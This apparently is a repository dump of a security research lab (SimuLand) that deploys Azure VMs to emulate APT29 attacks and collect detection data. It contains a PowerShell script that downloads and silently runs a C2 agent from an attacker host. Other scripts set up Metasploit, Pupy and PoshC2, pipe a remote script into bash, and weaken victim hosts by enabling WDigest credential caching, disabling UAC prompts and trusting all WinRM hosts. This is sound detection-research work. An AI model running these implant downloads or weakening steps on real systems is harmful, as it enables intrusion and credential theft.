35 |             "name": "[concat(trim(variables('vmListArray')[copyIndex()]), '/', parameters('extensionName'))]",
36 |             "location": "[parameters('location')]",
37 |             "copy": {
38 |                 "name": "vmCSCopy",
39 |                 "count": "[length(variables('vmListArray'))]"
40 |             },
41 |             "properties": {
42 |                 "publisher": "Microsoft.Azure.Extensions",
43 |                 "type": "CustomScript",
44 |                 "typeHandlerVersion": "2.1",
45 |                 "autoUpgradeMinorVersion": true,
46 |                 "settings": {},
47 |                 "protectedSettings": {
48 |                     "commandToExecute": "[parameters('commandToExecute')]",
49 |                     "fileUris": "[parameters('fileUris')]"
50 |                 }
51 |             }
52 |         }
53 |     ]
54 | }
55 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "vmName": {
 6 |             "type": "string",
 7 |             "metadata": {
 8 |                 "description": "Name of the VM to run scripts on"
 9 |             }
10 |         },
11 |         "extensionName": {
12 |             "type": "string"
13 |         },
14 |         "fileUris": {
15 |             "type": "array"
16 |         },
17 |         "commandToExecute": {
18 |             "type": "string"
19 |         },
20 |         "location": {
21 |             "type": "string",
22 |             "metadata": {
23 |                 "description": "Location for all resources."
24 |             }
25 |         }
26 |     },
27 |     "resources": [
28 |         {
29 |             "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 |             "type": "Microsoft.Compute/virtualMachines/extensions",
31 |             "apiVersion": "2019-03-01",
32 |             "location": "[parameters('location')]",
33 |             "properties": {
34 |                 "publisher": "Microsoft.Compute",
35 |                 "type": "CustomScriptExtension",
36 |                 "typeHandlerVersion": "1.8",
37 |                 "autoUpgradeMinorVersion": true,
38 |                 "settings": {
39 |                     "fileUris": "[parameters('fileUris')]",
40 |                     "commandToExecute": "[parameters('commandToExecute')]"
41 |                 },
42 |                 "protectedSettings": {}
43 |             }
44 |         }
45 |     ]
46 | }
47 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/nestedtemplates/vnet-dns-server.json:
--------------------------------------------------------------------------------
  1 | {
  2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  3 |     "contentVersion": "1.0.0.0",
  4 |     "parameters": {
  5 |         "virtualNetworkName": {
  6 |             "type": "string",
  7 |             "metadata": {
  8 |                 "description": "The name of the Virtual Network to Create"
  9 |             }
 10 |         },
 11 |         "virtualNetworkAddressRange": {
 12 |             "type": "string",
 13 |             "metadata": {
 14 |                 "description": "The address range of the new VNET in CIDR format"
 15 |             }
 16 |         },
 17 |         "subnetName1": {
 18 |             "type": "string",
 19 |             "metadata": {
 20 |                 "description": "The name of the subnet created in the new VNET"
 21 |             }
 22 |         },
 23 |         "subnetRange1": {
 24 |             "type": "string",
 25 |             "metadata": {
 26 |                 "description": "The address range of the subnet created in the new VNET"
 27 |             }
 28 |         },
 29 |         "subnetName2": {
 30 |             "type": "string",
 31 |             "metadata": {
 32 |                 "description": "The name of the subnet created in the new VNET"
 33 |             }
 34 |         },
 35 |         "subnetRange2": {
 36 |             "type": "string",
 37 |             "metadata": {
 38 |                 "description": "The address range of the subnet created in the new VNET"
 39 |             }
 40 |         },
 41 |         "subnetName3": {
 42 |             "type": "string",
 43 |             "metadata": {
 44 |                 "description": "The name of the subnet created in the new VNET"
 45 |             }
 46 |         },
 47 |         "subnetRange3": {
 48 |             "type": "string",
 49 |             "metadata": {
 50 |                 "description": "The address range of the subnet created in the new VNET"
 51 |             }
 52 |         },
 53 |         "DNSServerAddress": {
 54 |             "type": "array",
 55 |             "metadata": {
 56 |                 "description": "The DNS address(es) of the DNS Server(s) used by the VNET"
 57 |             }
 58 |         },
 59 |         "location": {
 60 |             "type": "string",
 61 |             "metadata": {
 62 |                 "description": "Location for all resources."
 63 |             }
 64 |         }
 65 |     },
 66 |     "resources": [
 67 |         {
 68 |             "type": "Microsoft.Network/virtualNetworks",
 69 |             "apiVersion": "2019-02-01",
 70 |             "name": "[parameters('virtualNetworkName')]",
 71 |             "location": "[parameters('location')]",
 72 |             "properties": {
 73 |                 "addressSpace": {
 74 |                     "addressPrefixes": [
 75 |                         "[parameters('virtualNetworkAddressRange')]"
 76 |                     ]
 77 |                 },
 78 |                 "dhcpOptions": {
 79 |                     "dnsServers": "[parameters('DNSServerAddress')]"
 80 |                 },
 81 |                 "subnets": [
 82 |                     {
 83 |                         "name": "[parameters('subnetName1')]",
 84 |                         "properties": {
 85 |                             "addressPrefix": "[parameters('subnetRange1')]"
 86 |                         }
 87 |                     },
 88 |                     {
 89 |                         "name": "[parameters('subnetName2')]",
 90 |                         "properties": {
 91 |                             "addressPrefix": "[parameters('subnetRange2')]"
 92 |                         }
 93 |                     },
 94 |                     {
 95 |                         "name": "[parameters('subnetName3')]",
 96 |                         "properties": {
 97 |                             "addressPrefix": "[parameters('subnetRange3')]"
 98 |                         }
 99 |                     }
100 |                 ]
101 |             }
102 |         }
103 |     ]
104 | }
105 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/payloads/day1/attack-platform.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/environments/attack-evals/apt29/payloads/day1/attack-platform.zip


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/payloads/day1/victim.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/environments/attack-evals/apt29/payloads/day1/victim.zip


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/payloads/day2/attack-platform.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/environments/attack-evals/apt29/payloads/day2/attack-platform.zip


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/payloads/day2/victim.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/environments/attack-evals/apt29/payloads/day2/victim.zip


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Invoke-Sandcat.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | $server="http://192.168.0.4:8888"
 5 | $url="$server/file/download"
 6 | $wc=New-Object System.Net.WebClient
 7 | $wc.Headers.add("platform","windows")
 8 | $wc.Headers.add("file","sandcat.go")
 9 | $data=$wc.DownloadData($url)
10 | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")
11 | get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f
12 | rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null
13 | 
14 | Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden
15 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-AD.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param(
 6 |     [Parameter(Mandatory=$true, Position=1)]
 7 |     [string]$domainFQDN,
 8 | 
 9 |     [Parameter(Mandatory=$true, Position=2)]
10 |     [string]$dcVMName
11 | )
12 | 
13 | & .\Set-OUs.ps1 -domainFQDN $domainFQDN
14 | & .\Add-DomainUsers.ps1 -domainFQDN $domainFQDN -dcVMName $dcVMName
15 | & .\Set-AuditSAMRemoteCalls.ps1
16 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-Adversary.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
  4 | # License: GPL-3.0
  5 | 
  6 | # *********** Help ***************
  7 | usage(){
  8 |     echo " "
  9 |     echo "Usage: $0 [option...]" >&2
 10 |     echo
 11 |     echo "   -s         ATT&CK Eval APT29 scenario (e.g. Day1 or Day2)"
 12 |     echo "   -p         Switch to use Mitre Caldera DIY plugin"
 13 |     echo "   -h         help menu"
 14 |     echo
 15 |     echo "Examples:"
 16 |     echo " $0 -s Day1"
 17 |     echo " $0 -s Day1 -p"
 18 |     exit 1
 19 | }
 20 | 
 21 | # ************ Command Options **********************
 22 | while getopts s:ph option
 23 | do
 24 |     case "${option}"
 25 |     in
 26 |         s) SCENARIO=$OPTARG;;
 27 |         p) DIY_PLUGIN="True";;
 28 |         h) usage;;
 29 |     esac
 30 | done
 31 | 
 32 | if ((OPTIND == 1))
 33 | then
 34 |     echo "No options specified"
 35 |     usage
 36 | fi
 37 | 
 38 | if [ -z "$SCENARIO" ]; then
 39 |   usage
 40 | else
 41 |     # Install Docker and Docker-Compose
 42 |     ./Install-Docker.sh
 43 | 
 44 |     # *********** Validating Input ***************
 45 |     case $SCENARIO in
 46 |         Day1);;
 47 |         Day2);;
 48 |         *)
 49 |             echo "$ERROR_TAG Not a valid scenario option. Valid Options: Day1 or Day2"
 50 |             usage
 51 |         ;;
 52 |     esac
 53 | 
 54 |     if [[ $DIY_PLUGIN ]]; then
 55 |         mkdir -p /opt/caldera/conf
 56 |         mkdir -p /opt/caldera/data/abilities/host-provision
 57 |         
 58 |         # Add Custom Facts
 59 |         mv 4fb34bde-b06d-445a-a146-8e35f79ce546.yml /opt/caldera/conf/4fb34bde-b06d-445a-a146-8e35f79ce546.yml
 60 |         
 61 |         # Download Fix (Step 11)
 62 |         wget -O /opt/caldera/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/caldera/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml
 63 |         chmod -R 755 /opt/caldera
 64 | 
 65 |         # ********* Build *************
 66 |         docker image pull cyb3rward0g/docker-caldera:evals-042720
 67 |         docker tag cyb3rward0g/docker-caldera:evals-042720 docker-caldera
 68 |         
 69 |         # ********* Run *************
 70 |         docker run --rm -it -p 8888:8888 -p 7010:7010 -p 7011:7011/udp -p 7012:7012 -v /opt/caldera/conf/4fb34bde-b06d-445a-a146-8e35f79ce546.yml:/usr/src/app/plugins/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml -v /opt/caldera/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml:/usr/src/app/plugins/evals/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml --name caldera -d docker-caldera
 71 | 
 72 |     else
 73 |         apt update -y
 74 |         apt install -y git unzip
 75 | 
 76 |         # Decompress attacker payloads
 77 |         unzip attack-platform.zip -d /opt/
 78 | 
 79 |         # *********** Running default C2 Selected ***********
 80 |         if [[ $SCENARIO == "Day1" ]]; then
 81 |             # *********** Update Payload Rights **************
 82 |             chmod -R 755 /opt/attack-platform/
 83 |             mkdir -p /srv/dav/data
 84 |             cp /opt/attack-platform/Seaduke/python.exe /srv/dav/data/
 85 |             chmod -R 755 /srv/dav/data
 86 | 
 87 |             # *********** WebDav Docker *****************
 88 |             # Reference: https://docs.bytemark.co.uk/article/run-your-own-webdav-server-with-docker/
 89 |             docker run --restart always -v /srv/dav:/var/lib/dav -e AUTH_TYPE=Digest -e USERNAME=cozy -e PASSWORD=MyCozyPassw0rd! --publish 80:80 --name webdav -e LOCATION=/webdav -d bytemark/webdav
 90 | 
 91 |             # *********** Pupy Docker ***************    
 92 |             docker image pull cyb3rward0g/docker-pupy:f8c829dd66449888ec3f4c7d086e607060bca892
 93 |             docker tag cyb3rward0g/docker-pupy:f8c829dd66449888ec3f4c7d086e607060bca892 docker-pupy 
 94 |             
 95 |             # Run manually:
 96 |             # docker run --rm -it -p 1234:1234 -v "/opt/attack-platform:/tmp/attack-platform" docker-pupy python pupysh.py
 97 | 
 98 |             # *********** Metasploit Docker *************** 
 99 |             docker image pull metasploitframework/metasploit-framework
100 | 
101 |             # Run manually:
102 |             # docker run --rm -it -p 443:443 -v "/opt/attack-platform:/tmp/attack-platform" metasploitframework/metasploit-framework ./msfconsole
103 |             # docker run --rm -it -p 8443:8443 -v "/opt/attack-platform:/tmp/attack-platform" metasploitframework/metasploit-framework ./msfconsole
104 | 
105 |         else
106 |             # create project folder
107 |             mkdir /opt/PoshC2_Project
108 |             # Install PoshC2
109 |             curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | bash
110 |             # Pull docker image
111 |             docker image pull cyb3rward0g/docker-poshc2:20200417
112 |             # tag image to be compatible with official PoshC2 scripts
113 |             docker tag cyb3rward0g/docker-poshc2:20200417 poshc2
114 | 
115 |             # Copy Day2 scripts to PoshC2 Modules
116 |             mv /opt/attack-platform/m /tmp/
117 |             cp /opt/attack-platform/* /opt/PoshC2/resources/modules/
118 | 
119 |             # Run Server Manually to create a few One-Liners!
120 |             # sudo docker run -ti --rm -p 443:443 -v /opt/PoshC2_Project:/opt/PoshC2_Project -v /opt/PoshC2:/opt/PoshC2 -e PAYLOAD_COMMS_HOST=https://192.168.0.4 poshc2 /usr/bin/posh-server
121 | 
122 |             # Make sure you update the scripts following ATT&CK evals Red Team Setup steps for day 2 in the /opt/PoshC2/resources/modules/ folder. 
123 |             # https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29/Emulation_Plan/Day%202#red-team-setup
124 | 
125 |             # Run Client Manually
126 |             # sudo docker run -ti --rm -v /opt/PoshC2_Project:/opt/PoshC2_Project -v /opt/PoshC2:/opt/PoshC2 poshc2 /usr/bin/posh
127 |         fi
128 |     fi
129 | fi
130 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param (
 6 |     [Parameter(Mandatory=$false)]
 7 |     [string]$ServerAddresses,
 8 | 
 9 |     [Parameter(Mandatory=$false)]
10 |     [switch]$SetDC
11 | )
12 | 
13 | & .\Prepare-Box.ps1
14 | 
15 | # Windows Security Audit Categories
16 | if ($SetDC){
17 |     & .\Enable-WinAuditCategories.ps1 -SetDC
18 | }
19 | else{
20 |     & .\Enable-WinAuditCategories.ps1
21 | }
22 | 
23 | # PowerShell Logging
24 | & .\Enable-PowerShell-Logging.ps1
25 | 
26 | # Installing Endpoint Agent
27 | & .\Install-Sysmon.ps1
28 | 
29 | # Set SACLs
30 | & .\Set-SACLs.ps1
31 | 
32 | # Set Wallpaper
33 | & .\Set-WallPaper.ps1
34 | 
35 | # ******************************************************
36 | #             APT29 Evals Environment                  *   
37 | #                                                      *
38 | # Reference:                                           *
39 | # https://attackevals.mitre.org/APT29/environment.html *
40 | # ******************************************************
41 | 
42 | # *** WinRM is enabled for all Windows hosts ***
43 | # Already Enabled
44 | 
45 | # *** Powershell execution policy is set to "Bypass" ***
46 | Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine -Force
47 | 
48 | # *** Registry modified to allow storage of wdigest credentials ***
49 | Write-Host "Setting WDigest to use logoncredential.."
50 | Set-ItemProperty -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value "1"
51 | 
52 | # *** Registry modified to disable Windows Defender ***
53 | # *** # Group Policy modified to disable Windows Defender ***
54 | # N/A. Handled by AntiMalware Extension and Manually
55 | 
56 | # Configured firewall to allow SMB
57 | Write-Host "Enable File and Printer Sharing"
58 | & netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
59 | 
60 | # Created an SMB share
61 | # N/A - Old Config (APT3)
62 | 
63 | # Setting UAC level to Never Notify
64 | Write-Host "Setting UAC level to Never Notify.."
65 | Set-ItemProperty -Force -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0
66 | 
67 | # RDP enabled for all Windows hosts
68 | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
69 | Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
70 | 
71 | # Setting static IP and DNS server IP
72 | if ($ServerAddresses)
73 | {
74 |     & .\Set-StaticIP.ps1 -ServerAddresses $ServerAddresses
75 | }
76 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-Logstash.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -n         EventHub Namespace"
11 |     echo "   -c         EventHub Connection String Primary"
12 |     echo "   -e         EventHub name"
13 |     echo "   -u         Local user to update files ownership"
14 |     echo
15 |     echo "Examples:"
16 |     echo " $0 -n <eventhubNamespace> -c <Endpoint=sb://xxxxx> -e <event hub name> -u wardog"
17 |     echo " "
18 |     exit 1
19 | }
20 | 
21 | # ************ Command Options **********************
22 | while getopts :n:c:e:u:h option
23 | do
24 |     case "${option}"
25 |     in
26 |         n) EVENTHUB_NAMESPACE=$OPTARG;;
27 |         c) EVENTHUB_CONNECTIONSTRING=$OPTARG;;
28 |         e) EVENTHUB_NAME=$OPTARG;;
29 |         u) LOCAL_USER=$OPTARG;;
30 |         h) usage;;
31 |     esac
32 | done
33 | 
34 | if ((OPTIND == 1))
35 | then
36 |     echo "No options specified"
37 |     usage
38 | fi
39 | 
40 | if [ -z "$EVENTHUB_NAMESPACE" ] || [ -z "$EVENTHUB_CONNECTIONSTRING" ] || [ -z "$EVENTHUB_NAME" ] || [ -z "$LOCAL_USER" ]; then
41 |   usage
42 | else
43 |     # Install Docker and Docker-Compose
44 |     ./Install-Docker.sh
45 | 
46 |     echo "creating local logstash folders"
47 |     mkdir -p /opt/logstash/scripts
48 |     mkdir -p /opt/logstash/pipeline
49 |     mkdir -p /opt/logstash/config
50 | 
51 |     echo "Downloading logstash files locally to be mounted to docker container"
52 |     wget -O /opt/logstash/scripts/logstash-entrypoint.sh https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/logstash/scripts/logstash-entrypoint.sh
53 |     wget -O /opt/logstash/pipeline/eventhub.conf https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/logstash/pipeline/eventhub.conf
54 |     wget -O /opt/logstash/config/logstash.yml https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/logstash/config/logstash.yml
55 |     wget -O /opt/logstash/docker-compose.yml https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/logstash/docker-compose.yml
56 |     wget -O /opt/logstash/Dockerfile https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/attack-evals/apt29/logstash/Dockerfile
57 | 
58 |     chown -R $LOCAL_USER:$LOCAL_USER /opt/logstash/*
59 |     chmod +x /opt/logstash/scripts/logstash-entrypoint.sh
60 | 
61 |     export BOOTSTRAP_SERVERS=$EVENTHUB_NAMESPACE.servicebus.windows.net:9093
62 |     export SASL_JAAS_CONFIG="org.apache.kafka.common.security.plain.PlainLoginModule required username=\$ConnectionString password='$EVENTHUB_CONNECTIONSTRING';"
63 |     export EVENTHUB_NAME=$EVENTHUB_NAME
64 | 
65 |     cd /opt/logstash/ && docker-compose -f docker-compose.yml up --build -d
66 | fi
67 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-Socat.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -i     Target IP Address to redirect traffic to"
11 |     echo "   -h         help menu"
12 |     echo
13 |     echo "Examples:"
14 |     echo " $0 -i 192.168.0.4"
15 |     exit 1
16 | }
17 | 
18 | # ************ Command Options **********************
19 | while getopts i:h option
20 | do
21 |     case "${option}"
22 |     in
23 |         i) TARGET_IP=$OPTARG;;
24 |         h) usage;;
25 |     esac
26 | done
27 | 
28 | if ((OPTIND == 1))
29 | then
30 |     echo "No options specified"
31 |     usage
32 | fi
33 | 
34 | if [ -z "$TARGET_IP" ]; then
35 |   usage
36 | else
37 |     #Install dependencies
38 |     apt update -y
39 |     apt install -y socat
40 | 
41 |     # Set up Socat
42 |     socat TCP-LISTEN:443,fork TCP:${TARGET_IP}:443 &
43 |     socat TCP-LISTEN:1234,fork TCP:${TARGET_IP}:1234 &
44 |     socat TCP-LISTEN:8443,fork TCP:${TARGET_IP}:8443 &
45 | fi
46 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-Victim.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param (
 6 |     [Parameter(Mandatory=$true)]
 7 |     [ValidateSet("Day1","Day2")] 
 8 |     [string]$scenario,
 9 | 
10 |     [Parameter(Mandatory=$true)]
11 |     [string]$domainName,
12 | 
13 |     [Parameter(Mandatory=$false)]
14 |     [switch]$useCalderaDIY
15 | )
16 | 
17 | # Setup Payloads
18 | if ($useCalderaDIY)
19 | {
20 |     move-item Invoke-Sandcat.ps1 C:\programdata\
21 | }
22 | else
23 | {
24 |     # Unzip file
25 |     write-Host "Decompressing Victim zip .."
26 |     $VictimFilePath = (Get-Item victim.zip).FullName
27 |     expand-archive -path $VictimFilePath -DestinationPath "C:\ProgramData\"
28 | }
29 | 
30 | # Set up PSRemoting Trusted Hosts
31 | write-host "Setting trusted hosts"
32 | Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force
33 | 
34 | # Installing Chocolatey
35 | Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
36 | choco feature enable -n allowGlobalConfirmation
37 | 
38 | if ($scenario -eq 'Day1')
39 | {
40 |     # Add user to local administrator group
41 |     net localgroup Administrators "$domainName\pbeesly" /add
42 | 
43 |     # Give Pam Beesly and Dwight Schrute Full control access to C:\Windows\Temp. User is already part of Administrator group which has Full Control access to it, but just in case ;) 
44 |     $acl = Get-Acl C:\Windows\Temp
45 |     $AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("$domainName\pbeesly","FullControl","Allow")
46 |     $acl.SetAccessRule($AccessRule)
47 |     $acl | Set-Acl C:\Windows\Temp
48 | 
49 |     # Chrome Installation
50 |     write-host "Installing Chrome"
51 |     choco install googlechrome
52 | 
53 |     if (!$useCalderaDIY)
54 |     {
55 |         # Import PFX Certificate
56 |         Import-PfxCertificate -Exportable -FilePath C:\programdata\victim\shockwave.local.pfx -CertStoreLocation Cert:\LocalMachine\My
57 |         
58 |         # rcs.3aka3.doc is downloaded to the victim system via the main ARM template (Private Storage Account ATM)
59 |     }
60 | }
61 | else
62 | {
63 |     # Add user to local administrator group
64 |     net localgroup Administrators "$domainName\dschrute" /add
65 | 
66 |     $acl = Get-Acl C:\Windows\Temp
67 |     $AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("$domainName\dschrute","FullControl","Allow")
68 |     $acl.SetAccessRule($AccessRule)
69 |     $acl | Set-Acl C:\Windows\Temp
70 |     
71 |     # Office 365 Installation
72 |     write-host "Installing Office 365"
73 |     choco install office365business
74 | }
75 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Set-WEC.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param (
 6 |     [Parameter(Mandatory=$false)]
 7 |     [string]$ServerAddresses
 8 | )
 9 | 
10 | & .\Prepare-Box.ps1
11 | 
12 | & .\Set-StaticIP.ps1 -ServerAddresses $ServerAddresses
13 | 
14 | # Set Wallpaper
15 | & .\Set-WallPaper.ps1
16 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Start-Packet-Capture.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -r     Resource Group Name"
11 |     echo "   -s     Storage Account Name"
12 |     echo "   -c     Computer Names (e.g VM01,VM02)"
13 |     echo
14 |     echo "Examples:"
15 |     echo " $0 -r resourcegroup01 -s storageaccount01 -c VM01,VM02"
16 |     echo " "
17 |     exit 1
18 | }
19 | 
20 | # ************ Command Options **********************
21 | while getopts r:s:c:h option
22 | do
23 |     case "${option}"
24 |     in
25 |         r) RESOURCE_GROUP=$OPTARG;;
26 |         s) STORAGE_ACCOUNT=$OPTARG;;
27 |         c) COMPUTER_NAMES=$OPTARG;;
28 |         h) usage;;
29 |     esac
30 | done
31 | 
32 | if ((OPTIND == 1))
33 | then
34 |     echo "No options specified"
35 |     usage
36 | fi
37 | 
38 | if [ -z "$RESOURCE_GROUP" ] || [ -z "$STORAGE_ACCOUNT" ] || [ -z "$COMPUTER_NAMES" ]; then
39 |   echo "[!] Make sure you provide values for the Resource group (-r), Storage Account (-s) and Computer Names (-c) parameters."
40 |   usage
41 | else
42 |     IFS=', ' read -r -a COMPUTER_ARRAY <<< "$COMPUTER_NAMES"
43 |     for COMPUTER in "${COMPUTER_ARRAY[@]}"; do
44 |         sleep 5
45 |         echo "[+] Starting ${COMPUTER}_PCAP session.."
46 |         az network watcher packet-capture create --resource-group ${RESOURCE_GROUP} --vm ${COMPUTER} --name "${COMPUTER}_PCAP" --storage-account ${STORAGE_ACCOUNT} --filters "
47 |     [
48 |         {
49 |             \"localIPAddress\":\"10.0.0.0-10.0.1.9\",
50 |             \"remoteIPAddress\":\"10.0.0.0-10.0.1.9\"
51 |         },
52 |         {
53 |             \"localIPAddress\":\"10.0.0.0-10.0.1.9\",
54 |             \"remoteIPAddress\":\"192.168.0.0-192.168.0.10\"
55 |         }
56 |     ]
57 |     "
58 |     done
59 | fi
60 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/scripts/Stop-Packet-Capture.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -r     Resource Group Name"
11 |     echo "   -c     Computer Names (e.g VM01,VM02)"
12 |     echo "   -l     Location (e.g eastus)"
13 |     echo "   -d     Delete PCAP session (Optional)"
14 |     echo
15 |     echo "Examples:"
16 |     echo " $0 -r resourcegroup01 -c VM01,VM02 -l eastus"
17 |     echo " "
18 |     exit 1
19 | }
20 | 
21 | # ************ Command Options **********************
22 | while getopts r:c:l:dh option
23 | do
24 |     case "${option}"
25 |     in
26 |         r) RESOURCE_GROUP=$OPTARG;;
27 |         c) COMPUTER_NAMES=$OPTARG;;
28 |         l) LOCATION=$OPTARG;;
29 |         d) DELETE_PCAP_SESSION="TRUE";;
30 |         h) usage;;
31 |     esac
32 | done
33 | 
34 | if ((OPTIND == 1))
35 | then
36 |     echo "No options specified"
37 |     usage
38 | fi
39 | 
40 | if [ -z "$RESOURCE_GROUP" ] || [ -z "$COMPUTER_NAMES" ] || [ -z "$LOCATION" ]; then
41 |   echo "[!] Make sure you provide values for the Resource group (-r), Computer Names (-c) parameters and Location (-l)."
42 |   usage
43 | else
44 |     IFS=', ' read -r -a COMPUTER_ARRAY <<< "$COMPUTER_NAMES"
45 |     for COMPUTER in "${COMPUTER_ARRAY[@]}"; do
46 |         sleep 5
47 |         echo "[+] Stopping ${COMPUTER}_PCAP session"
48 |         az network watcher packet-capture stop --name "${COMPUTER}_PCAP" --location ${LOCATION}
49 |         if [ ${DELETE_PCAP_SESSION} ]; then
50 |             echo "[+] Deleting ${COMPUTER}_PCAP session"
51 |             az network watcher packet-capture delete --name "${COMPUTER}_PCAP" --location ${LOCATION}
52 |         fi
53 |     done
54 | fi
55 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/README.md:
--------------------------------------------------------------------------------
  1 | # Cloud Breach S3
  2 | 
  3 | An environment to replicate an adversary abusing a misconfigured EC2 reverse proxy to obtain instance profile keys (Access and Secret) and eventually exfiltrate files from an S3 bucket. The configurations and deployment templates were adapted from the [Rhino Security labs - Cloud Goat project](https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3). The automatic cloudtrail configurations and templates were added to the environment with the main goal to extract the logs and share the dataset with the InfoSec community via the [Mordor project](https://mordordatasets.com/introduction.html).
  4 | 
  5 | # Resources Deployed
  6 | 
  7 | * S3 bucket (Sensitive Data)
  8 |     * One file uploaded at deployment time
  9 | * EC2
 10 |     * Nginx Installed (Reverse Proxy)
 11 |     * BankingWAFRole IAM Role
 12 |         * Full Access to S3 Bucket
 13 | * CloudTrail Trail
 14 |     * GlobalS3DataEventsTrail
 15 |         * Data Resource: S3 Bucket
